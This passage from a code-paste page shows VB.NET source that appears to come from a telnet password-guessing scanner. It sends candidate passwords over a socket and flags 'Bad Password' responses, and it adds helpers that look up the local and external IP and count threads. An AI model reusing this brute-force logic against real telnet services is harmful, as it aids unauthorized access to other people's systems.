- 'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
- sock.Send(System.Text.Encoding.ASCII.GetBytes(password))
- 'Thread.Sleep(100);
- Dim data As Byte() = New Byte(1023) {}
- 'string banner;
- Dim recv As Integer
- recv = sock.Receive(data)
- Dim stringdata As String = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet: " & stringdata)
- '''*
- 'strRetPage = null;
- 'bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- 'strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- 'while (bytes > 0)
- '{
- ' bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- ' strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- '}
- 'Console.WriteLine("Response telnet: " + strRetPage);
- '*
- 'Bad Password!!!
- If stringdata.Contains("*") OrElse stringdata.Contains("Password:") OrElse stringdata.Contains("Bad Password") Then
- Console.Write("{0} -> bad telnet password: {1}" & vbLf, password)
- End If
- Catch e As Exception
- Console.WriteLine("{0} -> " & e.Message)
- End Try
- Next
- End If
- Else
- ' If no data was recieved then the connection is probably dead
- Console.WriteLine("Disconnected", sock.RemoteEndPoint)
- sock.Shutdown(SocketShutdown.Both)
- sock.Close()
- End If
- End Sub
- Public Function LocalIPAddress() As String
- Dim host As IPHostEntry
- Dim localIP As String = ""
- host = Dns.GetHostEntry(Dns.GetHostName())
- For Each ip As IPAddress In host.AddressList
- If ip.AddressFamily.ToString() = "InterNetwork" Then
- localIP = ip.ToString()
- End If
- Next
- Return localIP
- End Function
- Public Shared Function GetExternalIp() As IPAddress
- Dim whatIsMyIp As String = "http://www.whatismyip.com/automation/n09230945.asp"
- Dim wc As New WebClient()
- Dim utf8 As New UTF8Encoding()
- Dim requestHtml As String = ""
- Try
- requestHtml = utf8.GetString(wc.DownloadData(whatIsMyIp))
- Catch we As WebException
- ' do something with exception
- Console.Write(we.ToString())
- End Try
- Dim externalIp As IPAddress = IPAddress.Parse(requestHtml)
- Return externalIp
- End Function
- Public Shared Function GetExternalIp2() As IPAddress
- Dim client As New WebClient()
- ' Add a user agent header in case the requested URI contains a query.
- client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)")
- Dim baseurl As String = "http://checkip.dyndns.org/"
- Dim data As Stream = client.OpenRead(baseurl)
- Dim reader As New StreamReader(data)
- Dim s As String = reader.ReadToEnd()
- data.Close()
- reader.Close()
- s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "").Replace("</body></html>", "").ToString()
- Dim externalIp As IPAddress = IPAddress.Parse(s)
- Return externalIp
- End Function
- Private Sub Lancer_Thread(emetteur As Object)
- 'Console.WriteLine("Evenement - Lancer_Thread");
- SyncLock Me
- ' Console.WriteLine("DEBUG PULSE");
- Monitor.Pulse(Me)
- End SyncLock
- End Sub
- Public Class Compteur_thread
- Public Enum Operation
- Incrementer = 1
- Decrementer = 2
- Nb_thread = 3
- Libre = 4
- End Enum
- Private operation As Operation = Operation.Incrementer
- Private compteur As Integer = 0
- Public Delegate Sub Lancer_Thread(emetteur As Object)
- Public Event lancer_thread As Lancer_Thread
- Public Sub Incrementer()
- SyncLock Me
- ' Console.WriteLine("DEBUG INCREMENTER");
- If (operation = Operation.Decrementer) OrElse (operation = Operation.Nb_thread) Then
- Try
- 'Console.WriteLine("Incrementer - Monitor.Wait()");
- Monitor.Wait(Me)
- Catch e As SynchronizationLockException
- ', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- Console.WriteLine(e.ToString())
- Catch e As ThreadInterruptedException
- ', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- Console.WriteLine(e.ToString())
- End Try
- End If
- 'Console.WriteLine("Incrementer");
- operation = Operation.Incrementer
- compteur += 1
- Monitor.Pulse(Me)
- operation = Operation.Libre
- End SyncLock
- End Sub
- Public Sub Decrementer()
- SyncLock Me
- ' Console.WriteLine("DEBUG DECREMENTER");
- If (operation = Operation.Incrementer) OrElse (operation = Operation.Nb_thread) Then
- Try
- 'Console.WriteLine("decrementer - Monitor.Wait()");
- Monitor.Wait(Me)
- Catch e As SynchronizationLockException
- ', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- Console.WriteLine(e.ToString())
- Catch e As ThreadInterruptedException
- ', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- Console.WriteLine(e.ToString())
- End Try
- End If
- 'Console.WriteLine("decrementer");
- operation = Operation.Decrementer
- compteur -= 1
- RaiseEvent lancer_thread(Me)
- Monitor.Pulse(Me)
- operation = Operation.Libre
- End SyncLock
- End Sub
- Public Sub Nb_thread(ByRef nb As Integer)
- SyncLock Me
- ' Console.WriteLine("DEBUG NB_THREAD");
- If (operation = Operation.Incrementer) OrElse (operation = Operation.Decrementer) Then
- Try
- 'Console.WriteLine("Nb_thread - Monitor.Wait()");
- Monitor.Wait(Me)
- Catch e As SynchronizationLockException
- ', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- Console.WriteLine(e.ToString())
- Catch e As ThreadInterruptedException
- ', "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
- Console.WriteLine(e.ToString())
- End Try
- End If
- 'Console.WriteLine("Nb_Thread classe");
- operation = Operation.Nb_thread
- nb = compteur
- Monitor.Pulse(Me)
- operation = Operation.Libre
- End SyncLock
- End Sub
- End Class
- End Class
- End Namespace
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement